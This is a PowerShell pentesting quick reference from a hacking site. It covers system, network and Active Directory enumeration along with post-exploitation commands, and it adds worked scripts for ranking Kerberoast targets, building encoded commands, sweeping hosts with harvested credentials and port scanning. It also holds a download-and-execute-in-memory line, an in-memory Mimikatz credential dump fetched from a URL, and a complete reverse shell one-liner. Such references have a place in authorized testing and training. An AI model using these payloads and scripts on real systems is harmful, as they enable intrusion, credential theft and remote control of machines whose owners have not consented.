PowerShell Pentesting Quick Reference
Hackers Manifest - hackersmanifest.com
PowerShell commands for enumeration, post-exploitation, and Active Directory attacks.
🖥️ System Enumeration
| Task | Command |
|---|---|
| System info | systeminfo |
| Hostname | $env:COMPUTERNAME |
| Current user (with groups and privileges) | whoami /all |
| Privileges | whoami /priv |
| Domain | $env:USERDOMAIN |
| Processes | Get-Process |
| Services | Get-Service |
| Environment | Get-ChildItem Env: |
👥 User & Group Enum
| Task | Command |
|---|---|
| Local users | Get-LocalUser |
| Local groups | Get-LocalGroup |
| Local admins | Get-LocalGroupMember -Group "Administrators" |
| Domain users | Get-ADUser -Filter * |
| Domain groups | Get-ADGroup -Filter * |
| Domain admins | Get-ADGroupMember -Identity "Domain Admins" -Recursive |
| User details | Get-ADUser user -Properties * |
The Get-AD* cmdlets need the ActiveDirectory module (part of RSAT) and a domain-joined context; check with Get-Module -ListAvailable ActiveDirectory before relying on them.
🌐 Network Enumeration
| Task | Command |
|---|---|
| IP config | Get-NetIPConfiguration |
| Adapters | Get-NetAdapter |
| Routes | route print (or Get-NetRoute) |
| ARP table | arp -a (or Get-NetNeighbor) |
| Listening ports | Get-NetTCPConnection \| Where-Object State -eq "Listen" |
| DNS lookup | Resolve-DnsName target.com |
| Local shares | Get-SmbShare |
| Remote shares | net view \\TARGET |
🏢 AD Enumeration
| Task | Command |
|---|---|
| Domain info | Get-ADDomain |
| DCs | Get-ADDomainController -Filter * |
| Trusts | Get-ADTrust -Filter * |
| Computers | Get-ADComputer -Filter * |
| Servers | Get-ADComputer -Filter 'OperatingSystem -like "*Server*"' -Properties OperatingSystem |
| GPOs | Get-GPO -All |
| OUs | Get-ADOrganizationalUnit -Filter * |
| SPNs (Kerberoast candidates) | Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName |
Get-GPO needs the GroupPolicy module; like the Get-AD* cmdlets it ships with RSAT.
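The SPN query above only lists accounts; deciding which ones are worth roasting takes a few more attributes. This added example (not code from the original cheat sheet) wraps the same Get-ADUser filter in a function that pulls password age, adminCount, group membership and the Kerberos encryption types allowed for the account. It assumes the RSAT ActiveDirectory module and a domain-joined session; account names and values in the output are whatever your domain returns.

```powershell
# Added example: rank Kerberoast candidates. Requires the ActiveDirectory
# module (RSAT) and a domain-joined context.
Import-Module ActiveDirectory -ErrorAction Stop

function Get-SpnAccount {
    [CmdletBinding()]
    param(
        [switch]$IncludeDisabled
    )
    $props = 'ServicePrincipalName', 'PasswordLastSet', 'AdminCount', 'Enabled',
             'MemberOf', 'msDS-SupportedEncryptionTypes'
    Get-ADUser -Filter { ServicePrincipalName -ne "$null" } -Properties $props |
        # krbtgt always has an SPN and is never a practical roasting target
        Where-Object { $_.SamAccountName -ne 'krbtgt' } |
        Where-Object { $IncludeDisabled -or $_.Enabled } |
        ForEach-Object {
            # msDS-SupportedEncryptionTypes bit 0x4 = RC4-HMAC. Unset means the
            # account falls back to the default, which still allows RC4, so the
            # service ticket can be requested with etype 23 (fast to crack).
            $enc = $_.'msDS-SupportedEncryptionTypes'
            [pscustomobject]@{
                SamAccountName  = $_.SamAccountName
                SPNs            = ($_.ServicePrincipalName -join '; ')
                PasswordLastSet = $_.PasswordLastSet
                PasswordAgeDays = if ($_.PasswordLastSet) {
                                      [int](New-TimeSpan -Start $_.PasswordLastSet).TotalDays
                                  } else { $null }
                AdminCount      = [bool]$_.AdminCount
                Groups          = (@($_.MemberOf) | ForEach-Object {
                                      ($_ -split ',')[0] -replace '^CN='
                                  }) -join '; '
                Rc4Allowed      = (-not $enc) -or (($enc -band 0x4) -ne 0)
            }
        }
}

# Privileged accounts (adminCount=1) and old passwords first: those give the
# most for the cracking time.
Get-SpnAccount |
    Sort-Object -Property @{Expression = 'AdminCount'; Descending = $true},
                          @{Expression = 'PasswordAgeDays'; Descending = $true} |
    Format-Table SamAccountName, AdminCount, PasswordAgeDays, Rc4Allowed, SPNs -AutoSize
```

Accounts with Rc4Allowed = False and only AES in msDS-SupportedEncryptionTypes still roast, but the resulting etype 17/18 hashes crack far slower, so they belong at the bottom of the list.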
📁 File Operations
| Task | Command |
|---|---|
| List files | Get-ChildItem -Recurse |
| Search files | Get-ChildItem -Recurse -Include *.txt |
| Search content (recursive) | Get-ChildItem -Recurse -Include *.txt,*.ini,*.config,*.xml \| Select-String -Pattern "password" |
| Read file | Get-Content file.txt |
| Write file | Set-Content -Path file.txt -Value "data" |
| Download | Invoke-WebRequest -Uri URL -OutFile file |
| Base64 decode (UTF-8 text) | [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("...")) |
🔓 Execution Policy Bypass
| Task | Command |
|---|---|
| Check policy (all scopes) | Get-ExecutionPolicy -List |
| Bypass flag | powershell -ep bypass |
| Set policy (current process only, no admin needed) | Set-ExecutionPolicy Bypass -Scope Process |
| Download & execute in memory | IEX (New-Object Net.WebClient).DownloadString('http://URL/script.ps1') |
| Encoded command (Base64 of the UTF-16LE command text) | powershell -enc BASE64_ENCODED_CMD |
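The -enc form trips people up because powershell.exe decodes the Base64 as UTF-16LE, not UTF-8; a blob produced with the wrong charset decodes to garbage and the command silently does nothing useful. This added example (not code from the original cheat sheet) builds the argument correctly, round-trips it, and shows what the UTF-8 mistake looks like. The command in $cmd is a placeholder.

```powershell
# Added example: build and verify a -EncodedCommand argument.
function ConvertTo-EncodedCommand {
    param([Parameter(Mandatory)][string]$Command)
    # powershell.exe -EncodedCommand expects Base64 over UTF-16LE bytes
    [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($Command))
}

function ConvertFrom-EncodedCommand {
    param([Parameter(Mandatory)][string]$Base64)
    [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Base64))
}

$cmd = 'Get-Process | Where-Object CPU -gt 100 | Select-Object -First 5'   # placeholder
$enc = ConvertTo-EncodedCommand $cmd

# Round-trip before using it on a target: a mismatch here is an encoder bug,
# not a target problem.
if ((ConvertFrom-EncodedCommand $enc) -ne $cmd) { throw 'encoding round-trip failed' }

# The common mistake: treating the blob as UTF-8. Every other byte is a NUL,
# which is why a mis-encoded command never runs.
$asUtf8 = [Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($enc))
"Decoded as UTF-8 contains NUL bytes: $($asUtf8.Contains([char]0))"

# Full launch line, usable from cmd.exe, a scheduled task or a service binary path
"powershell.exe -NoProfile -NonInteractive -ExecutionPolicy Bypass -EncodedCommand $enc"
```

Encoding is not evasion: with Script Block Logging enabled the decoded script still lands in event 4104, and the -enc flag itself is a common detection trigger in 4688 command-line logging.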
🌍 Remote Execution
| Task | Command |
|---|---|
| Enable WinRM (run on the target; needs admin) | Enable-PSRemoting -Force |
| Remote session | Enter-PSSession -ComputerName TARGET |
| With creds | Enter-PSSession -ComputerName TARGET -Credential DOMAIN\user |
| Run command | Invoke-Command -ComputerName TARGET -ScriptBlock {whoami} |
| Run script | Invoke-Command -ComputerName TARGET -FilePath script.ps1 |
| Multiple hosts | Invoke-Command -ComputerName HOST1,HOST2 -ScriptBlock {whoami} |
WinRM listens on TCP 5985 (HTTP) and 5986 (HTTPS); if those are closed on the target, none of the above will connect.
🔑 Credential Handling
| Task | Command |
|---|---|
| Prompt creds | $cred = Get-Credential |
| Create creds | $pass = ConvertTo-SecureString "Password" -AsPlainText -Force; $cred = New-Object PSCredential("user", $pass) |
| Run as user | Start-Process powershell -Credential $cred |
| Mimikatz (in memory) | IEX (IWR http://URL/Invoke-Mimikatz.ps1 -UseBasicParsing).Content; Invoke-Mimikatz -DumpCreds |
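The Remote Execution and Credential Handling entries come together when you want to fan a command out to a host list with a harvested credential and not lose the run because one host is unreachable. This added example (not code from the original cheat sheet) shows that: a non-interactive PSCredential, Invoke-Command over the list with errors collected instead of aborting, and a per-host ok/failed table. Host names, domain, user and password are placeholders.

```powershell
# Added example: run one script block on many hosts over WinRM with an
# explicit credential, tolerating per-host failures.
function Invoke-RemoteSweep {
    param(
        [Parameter(Mandatory)][string[]]$ComputerName,
        [Parameter(Mandatory)][pscredential]$Credential,
        [Parameter(Mandatory)][scriptblock]$ScriptBlock,
        [int]$ThrottleLimit = 16
    )
    $failed = @()
    # Invoke-Command already parallelises across hosts up to ThrottleLimit.
    # SilentlyContinue + ErrorVariable keeps going past dead or denied hosts
    # and hands us their error records afterwards.
    $results = Invoke-Command -ComputerName $ComputerName -Credential $Credential `
        -ScriptBlock $ScriptBlock -ThrottleLimit $ThrottleLimit `
        -ErrorAction SilentlyContinue -ErrorVariable failed

    foreach ($r in $results) {
        # PSComputerName is added to every object that comes back over remoting
        [pscustomobject]@{ Host = $r.PSComputerName; Status = 'ok'; Output = $r }
    }
    foreach ($e in $failed) {
        # Connection/auth failures name the host in TargetObject; errors raised
        # inside the remote script block carry it in OriginInfo.
        $h = if ($e.OriginInfo) { $e.OriginInfo.PSComputerName } else { $e.TargetObject }
        [pscustomobject]@{ Host = $h; Status = 'failed'; Output = $e.Exception.Message }
    }
}

# Non-interactive credential (same object Get-Credential would prompt for).
$pass = ConvertTo-SecureString 'Password123' -AsPlainText -Force          # placeholder
$cred = New-Object System.Management.Automation.PSCredential('CORP\svc_scan', $pass)   # placeholder

$targets = 'HOST1', 'HOST2', 'HOST3'   # placeholders
Invoke-RemoteSweep -ComputerName $targets -Credential $cred -ScriptBlock {
    # Runs on each target: who we landed as and whether that token is admin there
    $id = [Security.Principal.WindowsIdentity]::GetCurrent()
    $isAdmin = (New-Object Security.Principal.WindowsPrincipal $id).IsInRole(
        [Security.Principal.WindowsBuiltInRole]::Administrator)
    "$($id.Name) admin=$isAdmin"
} | Format-Table -AutoSize
```

Passing -Credential explicitly also sidesteps the double-hop problem for the first hop; anything the remote script block itself tries to reach with the network token (a file share, another host) will still fail unless CredSSP or delegation is configured.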
⚡ Useful One-Liners
Reverse Shell
$c=New-Object Net.Sockets.TCPClient('IP',4444);$s=$c.GetStream();[byte[]]$b=0..65535|%{0};while(($i=$s.Read($b,0,$b.Length)) -ne 0){$d=(New-Object Text.ASCIIEncoding).GetString($b,0,$i);$r=(iex $d 2>&1|Out-String);$s.Write(([text.encoding]::ASCII).GetBytes($r),0,$r.Length)}
Start a listener on the attacking host first (for example nc -lvnp 4444), then replace IP with its address.
Port Scan
1..1024 | % {echo ((New-Object Net.Sockets.TcpClient).Connect("IP",$_)) "$_ open"} 2>$null
This prints only ports where Connect succeeds, but it has no timeout: every filtered port blocks for the full OS connect timeout (roughly 20 seconds), so keep the port range short against firewalled hosts.
Ping Sweep
1..254 | % {"10.0.0.$_: $(Test-Connection -Count 1 -Quiet 10.0.0.$_)"}
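The one-liners above are fine for a quick look but the port scan stalls on filtered ports and the ping sweep prints every address whether it answered or not. This added example (not code from the original cheat sheet) is the version a practitioner ends up writing: a connect check with a per-port timeout via ConnectAsync, a sweep over a short list of interesting ports, and the ping sweep reduced to live hosts that feed the scan. The 10.0.0.0/24 range, port list and timeout are placeholders.

```powershell
# Added example: TCP connect scan with a bounded per-port timeout, fed by an
# ICMP sweep. Everything here is placeholder ranges/ports; adjust for the target.
function Test-TcpPort {
    param(
        [Parameter(Mandatory)][string]$Target,
        [Parameter(Mandatory)][int]$Port,
        [int]$TimeoutMs = 500
    )
    $client = New-Object System.Net.Sockets.TcpClient
    try {
        $task = $client.ConnectAsync($Target, $Port)
        # Wait returns $false on timeout (filtered). A refused port faults the
        # task and Wait throws, which the catch turns into "closed".
        $open = $task.Wait($TimeoutMs) -and $client.Connected
    } catch {
        $open = $false
    } finally {
        # Dispose also aborts a connect that is still pending after the timeout
        $client.Dispose()
    }
    [pscustomobject]@{ Target = $Target; Port = $Port; Open = $open }
}

function Invoke-PortSweep {
    param(
        [Parameter(Mandatory)][string[]]$Target,
        # Common Windows/AD service ports; placeholder list, extend as needed
        [int[]]$Port = @(21, 22, 23, 25, 53, 80, 88, 135, 139, 389, 443, 445, 636, 1433, 3389, 5985, 5986),
        [int]$TimeoutMs = 500
    )
    foreach ($t in $Target) {
        foreach ($p in $Port) {
            Test-TcpPort -Target $t -Port $p -TimeoutMs $TimeoutMs
        }
    }
}

# Ping sweep reduced to the hosts that actually answered, then scan only those.
$alive = 1..254 | ForEach-Object { "10.0.0.$_" } |
    Where-Object { Test-Connection -ComputerName $_ -Count 1 -Quiet -ErrorAction SilentlyContinue }

Invoke-PortSweep -Target $alive | Where-Object Open | Format-Table -AutoSize
```

Hosts that drop ICMP never make it into $alive; when that is likely, skip the ping step and pass the full address list to Invoke-PortSweep with 445 or 3389 as the liveness check instead.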